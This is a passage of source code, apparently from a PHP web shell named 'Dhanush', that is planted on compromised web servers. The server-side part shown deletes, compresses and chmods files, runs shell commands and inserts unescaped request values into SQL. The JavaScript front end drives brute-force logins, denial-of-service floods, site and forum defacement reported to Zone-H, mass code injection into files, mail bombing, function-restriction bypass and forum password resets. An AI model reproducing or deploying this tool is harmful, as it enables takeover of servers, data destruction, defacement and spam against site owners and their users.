4611 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4612 $num = mysql_num_rows( $pResult );
4613
4614 $rowcount = $num;
4615
4616 $pResultLen = mysql_list_fields( $dbname, $tablename );
4617
4618 for( $i = 0; $i < $num; $i++ )
4619 {
4620 $field = mysql_fetch_array( $pResult );
4621 $fieldname = $field["Field"];
4622 $arrdata = $_REQUEST[$fieldname];
4623
4624 $str1 .= "".$fieldname . ",";
4625 $str2 .= "'".$arrdata . "',";
4626 $rowcount--;
4627 if($rowcount != 0)
4628 {
4629 //$str1 .= $fieldname . ",";
4630 //$str2 .= $arrdata . ",";
4631 }
4632 }
4633 $str1=eregi_replace(',$', '', $str1);
4634 $str2=eregi_replace(',$', '', $str2);
4635 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4636 mysql_query($str);
4637
4638 ?><div id="showsql"></div><?php
4639}
4640else if(isset($_GET['logoutdb']))
4641{
4642 setcookie("dbserver",time() - 60*60);
4643 setcookie("dbuser",time() - 60*60);
4644 setcookie("dbpass",time() - 60*60);
4645 header("Location:$self");
4646}
4647else if(isset($_POST['choice']))
4648{
4649 if($_POST['choice'] == "delete")
4650 {
4651 $actbox = $_POST["actbox"];
4652
4653 foreach ($actbox as $myv)
4654 $myv = explode(",",$myv);
4655 foreach ($myv as $v)
4656 {
4657 if(is_file($v))
4658 {
4659 if(unlink($v))
4660 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4661 else
4662 echo "<br><center>Cannot Delete File $v</center>";
4663 }
4664 else if(is_dir($v))
4665 {
4666 rrmdir($v);
4667 }
4668 }
4669 }
4670 else if($_POST['choice'] == "chmod")
4671 { ?>
4672 <form id="chform"><?php
4673 $actbox1 = $_POST['actbox'];
4674 foreach ($actbox1 as $myv)
4675 $myv = explode(",",$myv);
4676 foreach ($myv as $v)
4677 { ?>
4678 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4679 <?php }
4680 ?>
4681 <table align="center" border="3" style="width:40%; border-color:#333333;">
4682 <tr>
4683 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4684 </tr>
4685 <tr>
4686 <td colspan="2" align="center" style="height:60px">
4687 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4688 </tr>
4689 </table>
4690
4691 </form> <?php
4692 }
4693 else if($_POST['choice'] == "changefileperms")
4694 {
4695 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4696 {
4697 $actbox = $_POST["actbox"];
4698 foreach ($actbox as $myv)
4699 $myv = explode(",",$myv);
4700 foreach ($myv as $v)
4701 {
4702 if(is_file($v) || is_dir($v))
4703 {
4704 $perms = 0;
4705 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4706 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4707 echo "<div align=left style=width:60%;>";
4708 if(@chmod($v,$perms))
4709 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4710 else
4711 echo "Cannot Change $v File Permissions<br>";
4712 echo "</div>";
4713 }
4714 }
4715
4716 }
4717 }
4718 else if($_POST['choice'] == "compre")
4719 {
4720 $actbox = $_POST["actbox"];
4721 foreach ($actbox as $myv)
4722 $myv = explode(",",$myv);
4723 foreach ($myv as $v)
4724 {
4725 if(is_file($v))
4726 {
4727 $zip = new ZipArchive();
4728 $filename= basename($v) . '.zip';
4729 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4730 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4731 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4732 $zip->addFile(basename($v));
4733 $zip->close();
4734 }
4735 else if(is_dir($v))
4736 {
4737 if($os == "Linux")
4738 {
4739 $filename= basename($v);
4740 execmd("tar --create --recursion --file=$filename.tar $v");
4741 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4742 }
4743 }
4744 }
4745 }
4746 else if($_POST['choice'] == "uncompre")
4747 {
4748 $actbox = $_POST["actbox"];
4749 foreach ($actbox as $myv)
4750 $myv = explode(",",$myv);
4751 foreach ($myv as $v)
4752 {
4753 if(is_file($v) || is_dir($v))
4754 {
4755 $zip = new ZipArchive;
4756 $filename= basename($v);
4757 $res = $zip->open($filename);
4758 if ($res === TRUE)
4759 {
4760 $pieces = explode(".",$filename);
4761 $zip->extractTo($pieces[0]);
4762 $zip->close();
4763 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4764 } else
4765 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4766 }
4767 }
4768 }
4769}
4770else if(isset($_GET['sitename']))
4771{
4772 $sitename = str_replace("http://","",$_GET['sitename']);
4773 $sitename = str_replace("http://www.","",$sitename);
4774 $sitename = str_replace("www.","",$sitename);
4775 $show = myexe("ls -la /etc/valiases/".$sitename);
4776 if(!empty($show))
4777 echo $show;
4778 else
4779 echo "Cannot get the username";
4780}
4781else if(isset($_GET['mydata']))
4782{
4783 listdatabase();
4784}
4785else if(isset($_GET['home']))
4786{
4787 mainfun($_GET['home']);
4788}
4789else if(isset($_GET['dir']))
4790{
4791 mainfun($_GET['myfilepath']);
4792}
4793else if(isset($_GET['mydirpath']))
4794{
4795 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4796}
4797else
4798{
4799?>
4800<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4801<title>Dhanush : By Arjun</title>
4802<script type="text/javascript">
4803checked = false;
4804var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
4805function checkedAll ()
4806{
4807 if (checked == false){checked = true}else{checked = false}
4808 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4809 {
4810 document.getElementById('myform').elements[i].checked = checked;
4811 }
4812}
4813function urlchange(myfilepath)
4814{
4815 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4816 splitter = "<?php echo addslashes($directorysperator); ?>";
4817 mypath = mpath = myfilepath.split(splitter);
4818 <?php if($os == "Linux") { ?>
4819 r = "/";
4820 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4821 <?php } ?>
4822 for (i = 0; i < mypath.length; i++)
4823 {
4824 if(mypath[i] == "")
4825 continue;
4826 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4827
4828 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4829 }
4830 myurl = myurl.replace(/\\/g,"\\\\");
4831 return myurl;
4832}
4833function wrtblDIR(mydirpath)
4834{
4835 var ajaxRequest;
4836 ajaxRequest = new XMLHttpRequest();
4837
4838 ajaxRequest.onreadystatechange = function()
4839 {
4840 if(ajaxRequest.readyState == 4)
4841 {
4842 for(i=0;i<=3;i++)
4843 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4844 }
4845 }
4846
4847 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4848 ajaxRequest.send(null);
4849}
4850function setpath(myfilpath)
4851{
4852 wrtblDIR(myfilpath);
4853 document.getElementById("path").value=myfilpath;
4854 document.getElementById("createfile").value=myfilpath;
4855 document.getElementById("createfolder").value=myfilpath;
4856 document.getElementById("createfolder").value=myfilpath;
4857 document.getElementById("exepath").value=myfilpath;
4858 document.getElementById("auexepath").value=myfilpath;
4859 document.getElementById("showdir").innerHTML="";
4860}
4861function changedir(myaction,myfilepath)
4862{
4863 var myurl = urlchange(myfilepath);
4864
4865 document.getElementById("showmaindata").innerHTML=waitstate;
4866 var ajaxRequest;
4867 ajaxRequest = new XMLHttpRequest();
4868
4869 ajaxRequest.onreadystatechange = function()
4870 {
4871 if(ajaxRequest.readyState == 4)
4872 {
4873 setpath(myfilepath);
4874 document.getElementById("crdir").innerHTML=myurl;
4875 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4876 }
4877 }
4878
4879 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4880 ajaxRequest.send(null);
4881}
4882function gethome(myaction,mydir)
4883{
4884 var myurl = urlchange(mydir);
4885 document.getElementById("showmaindata").innerHTML=waitstate;
4886 var ajaxRequest;
4887 ajaxRequest = new XMLHttpRequest();
4888
4889 ajaxRequest.onreadystatechange = function()
4890 {
4891 if(ajaxRequest.readyState == 4)
4892 {
4893 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4894 setpath(mydir);
4895 document.getElementById("crdir").innerHTML=myurl;
4896 }
4897 }
4898
4899 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4900 ajaxRequest.send(null);
4901}
4902function getname(sitename)
4903{
4904 document.getElementById("showsite").innerHTML=waitstate;
4905 var ajaxRequest;
4906 ajaxRequest = new XMLHttpRequest();
4907
4908 ajaxRequest.onreadystatechange = function()
4909 {
4910 if(ajaxRequest.readyState == 4)
4911 {
4912 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4913 }
4914 }
4915
4916 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4917 ajaxRequest.send(null);
4918}
4919function myaction(myfileaction,chmode)
4920{
4921 var mytype = document.getElementsByName('actbox[]');
4922 var mychoice = new Array();
4923
4924 for (var i = 0, length = mytype.length; i < length; i++)
4925 {
4926 if (mytype[i].checked)
4927 mychoice[i] = mytype[i].value;
4928 }
4929
4930 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4931
4932 document.getElementById("showdir").innerHTML=waitstate;
4933 var ajaxRequest;
4934 ajaxRequest = new XMLHttpRequest();
4935
4936 ajaxRequest.onreadystatechange = function()
4937 {
4938 if(ajaxRequest.readyState == 4)
4939 {
4940 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4941 }
4942 }
4943
4944 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4945 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4946 ajaxRequest.send(params);
4947}
4948function editdata()
4949{
4950 var result = "", // initialize list
4951 i,dbname,tablename;
4952 // iterate through arguments
4953 for (i = 1; i < arguments.length; i++)
4954 {
4955 if(i%2 == 0)
4956 result += arguments[i]+'=';
4957 else
4958 result += arguments[i]+'&';
4959 }
4960 result = result.slice(0, -1);
4961
4962 dbname = arguments[3];
4963 tablename = arguments[5];
4964 var result=result.replace(/dhanush_/g,"");
4965 var params = arguments[0]+"="+result;
4966
4967 document.getElementById("showsql").innerHTML=waitstate;
4968 var ajaxRequest;
4969 ajaxRequest = new XMLHttpRequest();
4970
4971 ajaxRequest.onreadystatechange = function()
4972 {
4973 if(ajaxRequest.readyState == 4)
4974 {
4975 viewtables('listTables',dbname,tablename);
4976 }
4977 }
4978
4979 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4980 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4981 ajaxRequest.send(params);
4982}
4983function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4984{
4985 document.getElementById("showsql").innerHTML=waitstate;
4986 var ajaxRequest;
4987 ajaxRequest = new XMLHttpRequest();
4988
4989 ajaxRequest.onreadystatechange = function()
4990 {
4991 if(ajaxRequest.readyState == 4)
4992 {
4993 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4994 }
4995 }
4996
4997 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
4998 ajaxRequest.send(null);
4999}
5000function mydatabase(server,username,password)
5001{
5002 document.getElementById("showsql").innerHTML=waitstate;
5003 var ajaxRequest;
5004 ajaxRequest = new XMLHttpRequest();
5005
5006 ajaxRequest.onreadystatechange = function()
5007 {
5008 if(ajaxRequest.readyState == 4)
5009 {
5010 mydatago();
5011 }
5012 }
5013
5014 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5015 ajaxRequest.send(null);
5016}
5017function mydatago()
5018{
5019 var ajaxRequest;
5020 ajaxRequest = new XMLHttpRequest();
5021
5022 ajaxRequest.onreadystatechange = function()
5023 {
5024 if(ajaxRequest.readyState == 4)
5025 {
5026 document.getElementById("datatable").style.display = 'none';
5027 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5028 }
5029 }
5030
5031 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5032 ajaxRequest.send(null);
5033}
5034function bruteforce(prototype,serverport,login,dict)
5035{
5036 var mytype = document.getElementsByName('mytype');
5037 for (var i = 0, length = mytype.length; i < length; i++)
5038 {
5039 if (mytype[i].checked)
5040 break;
5041 }
5042 var getreverse = 0;
5043 if(document.getElementById('reverse').checked == true)
5044 getreverse = 1;
5045 else
5046 getreverse = 0;
5047
5048 document.getElementById("showbrute").innerHTML=waitstate;
5049 var ajaxRequest;
5050 ajaxRequest = new XMLHttpRequest();
5051
5052 ajaxRequest.onreadystatechange = function()
5053 {
5054 if(ajaxRequest.readyState == 4)
5055 {
5056 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5057 }
5058 }
5059
5060 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5061 ajaxRequest.send(null);
5062}
5063function executemyfile(action,executepath,execute)
5064{
5065 document.getElementById("showmaindata").innerHTML=waitstate;
5066 var ajaxRequest;
5067 ajaxRequest = new XMLHttpRequest();
5068
5069 ajaxRequest.onreadystatechange = function()
5070 {
5071 if(ajaxRequest.readyState == 4)
5072 {
5073 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5074 }
5075 }
5076
5077 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5078 ajaxRequest.send(null);
5079}
5080function maindata(myaction,dir)
5081{
5082 document.getElementById("showmaindata").innerHTML=waitstate;
5083 var ajaxRequest;
5084 ajaxRequest = new XMLHttpRequest();
5085
5086 ajaxRequest.onreadystatechange = function()
5087 {
5088 if(ajaxRequest.readyState == 4)
5089 {
5090 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5091 document.getElementById("showdir").innerHTML="";
5092 }
5093 }
5094
5095 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5096 ajaxRequest.send(null);
5097}
5098function manuallyscriptfn(passwd)
5099{
5100 var message = encodeURIComponent(passwd);
5101 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5102 document.getElementById("showdata").innerHTML=waitstate;
5103 var ajaxRequest;
5104 ajaxRequest = new XMLHttpRequest();
5105
5106 ajaxRequest.onreadystatechange = function()
5107 {
5108 if(ajaxRequest.readyState == 4)
5109 {
5110 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5111 }
5112 }
5113
5114 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5115 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5116 ajaxRequest.send(params);
5117}
5118function my404page(message)
5119{
5120 var message = encodeURIComponent(message);
5121 var params = "404page=404page&message="+message;
5122 document.getElementById("showdata").innerHTML=waitstate;
5123 var ajaxRequest;
5124 ajaxRequest = new XMLHttpRequest();
5125
5126 ajaxRequest.onreadystatechange = function()
5127 {
5128 if(ajaxRequest.readyState == 4)
5129 {
5130 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5131 }
5132 }
5133
5134 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5135 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5136 ajaxRequest.send(params);
5137}
5138function executemyfn(executepath,executemycmd)
5139{
5140 document.getElementById("showexecute").innerHTML="Wait....";
5141 var ajaxRequest;
5142 ajaxRequest = new XMLHttpRequest();
5143
5144 ajaxRequest.onreadystatechange = function()
5145 {
5146 if(ajaxRequest.readyState == 4)
5147 {
5148 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5149 }
5150 }
5151
5152 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5153 ajaxRequest.send(null);
5154}
5155function zoneh(defacer,hackmode,reason,domain)
5156{
5157 var domain = encodeURIComponent(domain);
5158 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5159 document.getElementById("showzone").innerHTML=waitstate;
5160 var ajaxRequest;
5161 ajaxRequest = new XMLHttpRequest();
5162
5163 ajaxRequest.onreadystatechange = function()
5164 {
5165 if(ajaxRequest.readyState == 4)
5166 {
5167 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5168 }
5169 }
5170
5171 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5172 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5173 ajaxRequest.send(params);
5174}
5175function savemyfile(file,content)
5176{
5177 var content = encodeURIComponent(content);
5178 var params = "content="+content+"&file="+file;
5179 document.getElementById("showmydata").innerHTML=waitstate;
5180 var ajaxRequest;
5181 ajaxRequest = new XMLHttpRequest();
5182
5183 ajaxRequest.onreadystatechange = function()
5184 {
5185 if(ajaxRequest.readyState == 4)
5186 {
5187 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5188 }
5189 }
5190
5191 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5192 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5193 ajaxRequest.send(params);
5194}
5195function renamefun(file,to)
5196{
5197 document.getElementById("showmydata").innerHTML=waitstate;
5198 var ajaxRequest;
5199 ajaxRequest = new XMLHttpRequest();
5200
5201 ajaxRequest.onreadystatechange = function()
5202 {
5203 if(ajaxRequest.readyState == 4)
5204 {
5205 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5206 }
5207 }
5208
5209 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5210 ajaxRequest.send(null);
5211}
5212function changeperms(chmode,myfilename)
5213{
5214 document.getElementById("showmydata").innerHTML=waitstate;
5215 var ajaxRequest;
5216 ajaxRequest = new XMLHttpRequest();
5217
5218 ajaxRequest.onreadystatechange = function()
5219 {
5220 if(ajaxRequest.readyState == 4)
5221 {
5222 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5223 }
5224 }
5225
5226 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5227 ajaxRequest.send(null);
5228}
5229function defacefun(deface)
5230{
5231 var ajaxRequest;
5232 ajaxRequest = new XMLHttpRequest();
5233
5234 ajaxRequest.onreadystatechange = function()
5235 {
5236 if(ajaxRequest.readyState == 4)
5237 {
5238 alert(ajaxRequest.responseText);
5239 }
5240 }
5241
5242 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5243 ajaxRequest.send(null);
5244}
5245function fileaction(myaction,myfilepath)
5246{
5247 document.getElementById("showmydata").innerHTML=waitstate;
5248 var ajaxRequest;
5249 ajaxRequest = new XMLHttpRequest();
5250
5251 ajaxRequest.onreadystatechange = function()
5252 {
5253 if(ajaxRequest.readyState == 4)
5254 {
5255 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5256 }
5257 }
5258
5259 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5260 ajaxRequest.send(null);
5261}
5262function bypassfun(funct,functvalue,optiontype)
5263{
5264 document.getElementById("showbyp").innerHTML=waitstate;
5265 var ajaxRequest;
5266 ajaxRequest = new XMLHttpRequest();
5267
5268 ajaxRequest.onreadystatechange = function()
5269 {
5270 if(ajaxRequest.readyState == 4)
5271 {
5272 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5273 }
5274 }
5275
5276 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5277 ajaxRequest.send(null);
5278}
5279function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5280{
5281 document.getElementById("showdos").innerHTML=waitstate;
5282 var ajaxRequest;
5283 ajaxRequest = new XMLHttpRequest();
5284
5285 ajaxRequest.onreadystatechange = function()
5286 {
5287 if(ajaxRequest.readyState == 4)
5288 {
5289 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5290 }
5291 }
5292
5293 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5294 ajaxRequest.send(null);
5295}
5296function createfile(filecreator,filecontent)
5297{
5298 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
5299 var filecontent = encodeURIComponent(filecontent);
5300 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
5301 document.getElementById("showdir").innerHTML=waitstate;
5302 var ajaxRequest;
5303 ajaxRequest = new XMLHttpRequest();
5304
5305 ajaxRequest.onreadystatechange = function()
5306 {
5307 if(ajaxRequest.readyState == 4)
5308 {
5309 gethome('home',mm);
5310 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5311 }
5312 }
5313
5314 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5315 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5316 ajaxRequest.send(params);
5317}
5318function createdir(create,createfolder)
5319{
5320 document.getElementById("showdir").innerHTML=waitstate;
5321 var ajaxRequest;
5322 ajaxRequest = new XMLHttpRequest();
5323
5324 ajaxRequest.onreadystatechange = function()
5325 {
5326 if(ajaxRequest.readyState == 4)
5327 {
5328 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5329 }
5330 }
5331
5332 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
5333 ajaxRequest.send(null);
5334}
5335function codeinsert(code)
5336{
5337 var code = encodeURIComponent(code);
5338 var params = "getcode="+code;
5339 document.getElementById("showcode").innerHTML=waitstate;
5340 var ajaxRequest;
5341 ajaxRequest = new XMLHttpRequest();
5342
5343 ajaxRequest.onreadystatechange = function()
5344 {
5345 if(ajaxRequest.readyState == 4)
5346 {
5347 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
5348 }
5349 }
5350
5351 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5352 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5353 ajaxRequest.send(params);
5354}
5355function getmydata(mydata)
5356{
5357 document.getElementById("showmydata").innerHTML=waitstate;
5358 var ajaxRequest;
5359 ajaxRequest = new XMLHttpRequest();
5360
5361 ajaxRequest.onreadystatechange = function()
5362 {
5363 if(ajaxRequest.readyState == 4)
5364 {
5365 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5366 }
5367 }
5368
5369 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
5370 ajaxRequest.send(null);
5371}
5372function getdata(mydata,myfile)
5373{
5374 document.getElementById("showdata").innerHTML=waitstate;
5375 var ajaxRequest;
5376 ajaxRequest = new XMLHttpRequest();
5377
5378 ajaxRequest.onreadystatechange = function()
5379 {
5380 if(ajaxRequest.readyState == 4)
5381 {
5382 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5383 }
5384 }
5385
5386 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
5387 ajaxRequest.send(null);
5388}
5389function getport(host,protocol,start,end)
5390{
5391 document.getElementById("showports").innerHTML=waitstate;
5392 var ajaxRequest;
5393 ajaxRequest = new XMLHttpRequest();
5394
5395 ajaxRequest.onreadystatechange = function()
5396 {
5397 if(ajaxRequest.readyState == 4)
5398 {
5399 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
5400 }
5401 }
5402
5403 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
5404 ajaxRequest.send(null);
5405}
5406function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
5407{
5408 document.getElementById("showchangepass").innerHTML=waitstate;
5409 var ajaxRequest;
5410 ajaxRequest = new XMLHttpRequest();
5411
5412 ajaxRequest.onreadystatechange = function()
5413 {
5414 if(ajaxRequest.readyState == 4)
5415 {
5416 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
5417 }
5418 }
5419
5420 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
5421 ajaxRequest.send(null);
5422}
5423function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
5424{
5425 var index = encodeURIComponent(index);
5426 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
5427 document.getElementById("showdeface").innerHTML=waitstate;
5428 var ajaxRequest;
5429 ajaxRequest = new XMLHttpRequest();
5430
5431 ajaxRequest.onreadystatechange = function()
5432 {
5433 if(ajaxRequest.readyState == 4)
5434 {
5435 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
5436 }
5437 }
5438
5439 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5440 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5441 ajaxRequest.send(params);
5442}
5443function codeinjector(pathtomass,mode,filetype,injectthis)
5444{
5445 var injectthis = encodeURIComponent(injectthis);
5446 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
5447 document.getElementById("showinject").innerHTML=waitstate;
5448 var ajaxRequest;
5449 ajaxRequest = new XMLHttpRequest();
5450
5451 ajaxRequest.onreadystatechange = function()
5452 {
5453 if(ajaxRequest.readyState == 4)
5454 {
5455 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
5456 }
5457 }
5458
5459 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5460 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5461 ajaxRequest.send(params);
5462}
5463function sendmail(mailfunction,to,subject,message,from,times,padding)
5464{
5465 var message = encodeURIComponent(message);
5466 if(mailfunction == "massmailing")
5467 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
5468 else if(mailfunction == "dobombing")
5469 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
5470 document.getElementById("showmail").innerHTML=waitstate;
5471 var ajaxRequest;
5472 ajaxRequest = new XMLHttpRequest();
5473
5474 ajaxRequest.onreadystatechange = function()
5475 {
5476 if(ajaxRequest.readyState == 4)
5477 {
5478 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
5479 }
5480 }
5481
5482 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5483 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5484 ajaxRequest.send(params);
5485}
5486function execode(code)
5487{
5488 var intext = document.getElementById('intext').checked;
5489 var message = encodeURIComponent(message);
5490 var params = "code="+code+"&intext="+intext;
5491 document.getElementById("showresult").innerHTML=waitstate;
5492 var ajaxRequest;
5493 ajaxRequest = new XMLHttpRequest();
5494
5495 ajaxRequest.onreadystatechange = function()
5496 {
5497 if(ajaxRequest.readyState == 4)
5498 {
5499 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
5500 }
5501 }
5502
5503 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5504 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5505 ajaxRequest.send(params);
5506}
5507function malwarefun(malwork)
5508{
5509 var malpath = document.getElementById('createfile').value;
5510 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5511 var ajaxRequest;
5512 ajaxRequest = new XMLHttpRequest();
5513
5514 ajaxRequest.onreadystatechange = function()
5515 {
